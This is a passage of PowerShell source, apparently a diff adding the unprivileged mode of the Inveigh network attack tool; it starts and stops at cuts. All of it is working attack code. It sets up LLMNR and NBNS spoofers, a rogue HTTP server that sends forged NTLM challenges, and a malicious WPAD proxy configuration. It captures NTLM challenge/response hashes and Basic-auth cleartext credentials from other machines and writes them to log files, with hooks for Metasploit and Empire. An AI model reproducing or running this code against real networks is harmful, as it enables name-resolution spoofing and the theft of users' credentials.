[parameter(Mandatory=$false)][Int]$LLMNRTTL = "30", + [parameter(Mandatory=$false)][Int]$NBNSTTL = "165", + [parameter(Mandatory=$false)][Int]$WPADPort = "", + [parameter(Mandatory=$false)][Int]$RunCount = "", + [parameter(Mandatory=$false)][Int]$RunTime = "", + [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS", + [parameter(Mandatory=$false)][String]$HTTPResponse = "", + [parameter(Mandatory=$false)][String]$WPADResponse = "", + [parameter(Mandatory=$false)][String]$NBNSBruteForceHost = "WPAD", + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if ($invalid_parameter) +{ + throw "$($invalid_parameter) is not a valid parameter." +} + +if($NBNSBruteForce -eq 'Y') +{ + $NBNS = 'N' + $LLMNR = 'N' +} + +if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget) +{ + throw "You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce" +} + +if(!$SpooferIP) +{ + $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) +} + +if($WPADIP -or $WPADPort) +{ + + if(!$WPADIP) + { + throw "You must specify a -WPADPort to go with -WPADIP" + } + + if(!$WPADPort) + { + throw "You must specify a -WPADIP to go with -WPADPort" + } + +} + +if(!$OutputDir) +{ + $output_directory = $PWD.Path +} +else +{ + $output_directory = $OutputDir +} + +if(!$inveigh) +{ + $global:inveigh = [HashTable]::Synchronized(@{}) + $inveigh.log = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList + $inveigh.cleartext_list = New-Object System.Collections.ArrayList + $inveigh.IP_capture_list = New-Object System.Collections.ArrayList + $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList + $inveigh.valid_host_list = New-Object System.Collections.ArrayList +} + +if($inveigh.unprivileged_running) +{ + throw "Invoke-InveighUnprivileged is already running, use Stop-Inveigh" +} + +if(!$inveigh.running -or !$inveigh.relay_running) +{ + $inveigh.console_queue = New-Object System.Collections.ArrayList + $inveigh.status_queue = New-Object System.Collections.ArrayList + $inveigh.log_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList + $inveigh.certificate_application_ID = $HTTPSCertAppID + $inveigh.certificate_thumbprint = $HTTPSCertThumbprint + $inveigh.console_output = $false + $inveigh.console_input = $true + $inveigh.file_output = $false + $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" + $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" + $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" +} + +$inveigh.hostname_spoof = $false +$inveigh.unprivileged_running = $true + +if($StatusOutput -eq 'Y') +{ + $inveigh.status_output = $true +} +else +{ + $inveigh.status_output = $false +} + +if($OutputStreamOnly -eq 'Y') +{ + $inveigh.output_stream_only = $true +} +else +{ + $inveigh.output_stream_only = $false +} + +if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension +{ + $inveigh.tool = 1 + $inveigh.output_stream_only = $true + $inveigh.newline = "" + $ConsoleOutput = "N" +} +elseif($Tool -eq 2) # PowerShell Empire +{ + $inveigh.tool = 2 + $inveigh.output_stream_only = $true + $inveigh.console_input = $false + $inveigh.newline = "`n" + $ConsoleOutput = "Y" + $ShowHelp = "N" +} +else +{ + $inveigh.tool = 0 + $inveigh.newline = "" +} + +# Write startup messages +$inveigh.status_queue.Add("Inveigh Unprivileged started at $(Get-Date -format 's')") > $null +$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Unprivileged started")]) > $null + +$firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} + +if($firewall_status) +{ + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null + + $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2 + $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}" + + if($firewall_powershell) + { + $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null + } + +} + +if($LLMNR -eq 'Y') +{ + $LLMNR_port_check = netstat -anp UDP | findstr 0.0.0.0:5355 + + if(!$LLMNR_port_check) + { + $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null + $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null + $LLMNR_response_message = "- response sent" + } + else + { + $LLMNR = "N" + $inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355") > $null + } +} +else +{ + $inveigh.status_queue.Add("LLMNR Spoofer = Disabled") > $null + $LLMNR_response_message = "- LLMNR spoofer is disabled" +} + +if($NBNS -eq 'Y') +{ + $NBNSTypes_output = $NBNSTypes -join "," + + if($NBNSTypes.Count -eq 1) + { + $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null + } + else + { + $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null + } + + $NBNS_response_message = "- response sent" +} +else +{ + $inveigh.status_queue.Add("NBNS Spoofer = Disabled") > $null + $NBNS_response_message = "- NBNS spoofer is disabled" +} + +if($NBNSBruteForce -eq 'Y') +{ + $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null + $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null + $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null + + if($NBNSBruteForcePause) + { + $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null + } + +} +else +{ + $inveigh.status_queue.Add("NBNS Brute Force Spoofer = Disabled") > $null +} + +if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y') +{ + $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null +} + +if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null +} + +if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null +} + +if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer Ips Reply = " + ($SpooferIPsReply -join ",")) > $null +} + +if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null +} + +if($SpooferRepeat -eq 'N') +{ + $inveigh.spoofer_repeat = $false + $inveigh.status_queue.Add("Spoofer Repeating = Disabled") > $null +} +else +{ + $inveigh.spoofer_repeat = $true +} + +if($HTTP -eq 'Y') +{ + $HTTP_port_check += netstat -anp TCP | findstr 0.0.0.0:$HTTPPort + + if($HTTPIP) + { + $HTTP_port_check += netstat -anp TCP | findstr $HTTPIP`:$HTTPPort + } + + if($HTTP_port_check) + { + $HTTP = "N" + $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null + } + else + { + + if($HTTPIP) + { + $inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null + } + + if($HTTPPort -ne 80) + { + $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null + } + + $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null + $inveigh.status_queue.Add("HTTP Authentication = $HTTPAuth") > $null + $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null + + if($HTTPResponse) + { + $inveigh.status_queue.Add("HTTP Custom Response = Enabled") > $null + } + + if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic') + { + $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null + } + + if($WPADIP -and $WPADPort) + { + $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null + + if($WPADDirectHosts) + { + $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null + } + + } + elseif($WPADResponse -and !$WPADIP -and !$WPADPort) + { + $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null + } + elseif($WPADEmptyFile -eq 'Y') + { + $inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null + } + + if($Challenge) + { + $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null + } + + if($MachineAccounts -eq 'n') + { + $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null + $inveigh.machine_accounts = $false + } + else + { + $inveigh.machine_accounts = $true + } + + } + +} +else +{ + $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null +} + +if($ConsoleOutput -eq 'Y') +{ + $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null + $inveigh.console_output = $true + + if($ConsoleStatus -eq 1) + { + $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute") > $null + } + elseif($ConsoleStatus -gt 1) + { + $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes") > $null + } + +} +else +{ + + if($inveigh.tool -eq 1) + { + $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null + } + else + { + $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null + } + +} + +if($ConsoleUnique -eq 'Y') +{ + $inveigh.console_unique = $true +} +else +{ + $inveigh.console_unique = $false +} + +if($FileOutput -eq 'Y') +{ + $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null + $inveigh.status_queue.Add("Output Directory = $output_directory") > $null + $inveigh.file_output = $true +} +else +{ + $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null +} + +if($FileUnique -eq 'Y') +{ + $inveigh.file_unique = $true +} +else +{ + $inveigh.file_unique = $false +} + +if($RunTime -eq 1) +{ + $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null +} +elseif($RunTime -gt 1) +{ + $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null +} + +if($RunCount) +{ + $inveigh.status_queue.Add("Run Count = $RunCount") > $null +} + +if($ShowHelp -eq 'Y') +{ + $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Unprivileged") > $null + + if($inveigh.console_output) + { + $inveigh.status_queue.Add("Press any key to stop real time console output") > $null + } + +} + +if($inveigh.status_output) +{ + + while($inveigh.status_queue.Count -gt 0) + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.status_queue[0] + $inveigh.newline) + $inveigh.status_queue.RemoveAt(0) + } + else + { + + switch -Wildcard ($inveigh.status_queue[0]) + { + + "* Disabled Due To *" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + "Run Stop-Inveigh to stop Inveigh-Unprivileged" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + default + { + Write-Output($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + } + + } + + } + +} + +# Begin ScriptBlocks + +# Shared Basic functions ScriptBlock +$shared_basic_functions_scriptblock = +{ + + function DataLength2 + { + param ([Int]$length_start,[Byte[]]$string_extract_data) + + $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0) + return $string_length + } + + function DataLength4 + { + param ([Int]$length_start,[Byte[]]$string_extract_data) + + $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0) + return $string_length + } + + function DataToString + { + param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data) + + $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)]) + $string_data = $string_data -replace "-00","" + $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $string_extract = New-Object System.String ($string_data,0,$string_data.Length) + return $string_extract + } + +} + +# HTTP Server ScriptBlock - HTTP listener +$HTTP_scriptblock = +{ + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPIP,$HTTPPort,$HTTPResponse,$NBNSBruteForcePause,$WPADAuth,$WPADEmptyFile,$WPADIP,$WPADPort,$WPADDirectHosts,$WPADResponse,$RunCount) + + function NTLMChallengeBase64 + { + param ([String]$Challenge) + + $HTTP_timestamp = Get-Date + $HTTP_timestamp = $HTTP_timestamp.ToFileTime() + $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) + $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + + if($Challenge) + { + $HTTP_challenge = $Challenge + $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') + $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + } + else + { + $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', '' + $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + } + + $inveigh.HTTP_challenge_queue.Add($HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null + + $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, + 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 + + $HTTP_challenge_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, + 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, + 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, + 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, + 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, + 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, + 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, + 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, + 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + + $HTTP_timestamp + + 0x00,0x00,0x00,0x00,0x0a,0x0a + + $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) + $NTLM = "NTLM " + $NTLM_challenge_base64 + $NTLM_challenge = $HTTP_challenge + + return $NTLM + } + + if($HTTPIP) + { + $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP) + $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort) + } + else + { + $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort) + } + + $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint + $HTTP_listener.Start() + + $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate + $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count + $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count + $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count + + if($WPADIP -and $WPADPort) + { + + if($WPADDirectHosts) + { + + foreach($WPAD_direct_host in $WPADDirectHosts) + { + $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' + } + + $HTTP_WPAD_response = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + } + else + { + $HTTP_WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + } + + } + elseif($WPADResponse) + { + $HTTP_WPAD_response = $WPADResponse + } + elseif($WPADEmptyFile -eq 'Y') + { + $HTTP_WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}" + } + + $HTTP_client_close = $true + + :HTTP_listener_loop while ($inveigh.unprivileged_running) + { + $TCP_request = "" + $TCP_request_bytes = New-Object System.Byte[] 1024 + + while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected) + { + + Start-Sleep -m 10 + + if(!$inveigh.unprivileged_running) + { + break HTTP_listener_loop + } + + } + + if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.unprivileged_running) + { + $HTTP_client = $HTTP_listener.AcceptTcpClient() # will block here until connection + $HTTP_stream = $HTTP_client.GetStream() + } + + $HTTP_stream_timeout = New-TimeSpan -Seconds 2 + $HTTP_stream_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + + while($HTTP_stream.DataAvailable -and $HTTP_stream_stopwatch.Elapsed -lt $HTTP_stream_timeout) + { + $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) + } + + $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes) + + if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*") + { + $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3) + $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length) + + if($NBNSBruteForcePause) + { + $inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + $inveigh.hostname_spoof = $true + } + + if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") + { + $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46) + $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-")) + $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length) + } + else + { + $authentication_header = "" + } + + if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') + { + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + } + else + { + $HTTP_response_status_code = 0x34,0x30,0x31 + $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64 + } + + $HTTP_type = "HTTP" + $NTLM = "NTLM" + $NTLM_auth = $false + $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + + if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")]) + } + + if($authentication_header.startswith('NTLM ')) + { + $authentication_header = $authentication_header -replace 'NTLM ','' + [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) + $HTTP_response_status_code = 0x34,0x30,0x31 + + if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') + { + $HTTP_response_status_code = 0x34,0x30,0x31 + $NTLM = NTLMChallengeBase64 $Challenge + $HTTP_client_close = $false + } + elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') + { + $NTLM = "NTLM" + $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes + $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes + $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes + $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes + [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*' + $HTTP_challenge_queue.Remove($NTLM_challenge) + $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) + + if($HTTP_NTLM_domain_length -eq 0) + { + $HTTP_NTLM_domain_string = "" + } + else + { + $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes + } + + $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes + $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes + $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes + $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes + $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes + + if($HTTP_NTLM_length -eq 24) # NTLMv1 + { + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(48,':') + $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge + + if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) + { + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) + $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) + + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash) + } + else + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + } + + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + { + $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) + $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) + } + + if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + { + $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + } + + } + + } + else # NTLMv2 + { + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(32,':') + $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response + + if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) + { + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) + $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) + + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash) + } + else + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + } + + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + { + $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) + $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) + } + + if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + { + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + } + + } + + } + + if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($HTTP_source_IP) + } + + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $NTLM_auth = $true + $HTTP_client_close = $true + $NTLM_challenge = "" + } + else + { + $NTLM = "NTLM" + $HTTP_client_close = $false + } + + } + elseif($authentication_header.startswith('Basic ')) + { + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $authentication_header = $authentication_header -replace 'Basic ','' + $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header)) + $HTTP_client_close = $true + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")]) + $inveigh.cleartext_file_queue.Add($cleartext_credentials) + $inveigh.cleartext_list.Add($cleartext_credentials) + $inveigh.console_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") + + if($inveigh.file_output) + { + $inveigh.console_queue.Add("Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) + } + + } + else + { + if($HTTPAuth -ne 'Anonymous' -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -ne 'Anonymous')) + { + $HTTP_client_close = $false + } + else + { + $HTTP_client_close = $true + } + + } + + $HTTP_timestamp = Get-Date -format r + $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) + + if((($WPADIP -and $WPADPort) -or $WPADResponse -or $WPADEmptyFile -eq 'Y') -and $HTTP_request_raw_URL -match '/wpad.dat') + { + $HTTP_message = $HTTP_WPAD_response + } + elseif($HTTPResponse -and $HTTP_request_raw_URL -notmatch '/wpad.dat') + { + $HTTP_message = $HTTPResponse + } + else + { + $HTTP_message = "" + } + + $HTTP_timestamp = Get-Date -format r + $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) + + if(($HTTPAuth -eq 'NTLM' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth) + { + $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM) + $HTTP_message_bytes = 0x0d,0x0a + 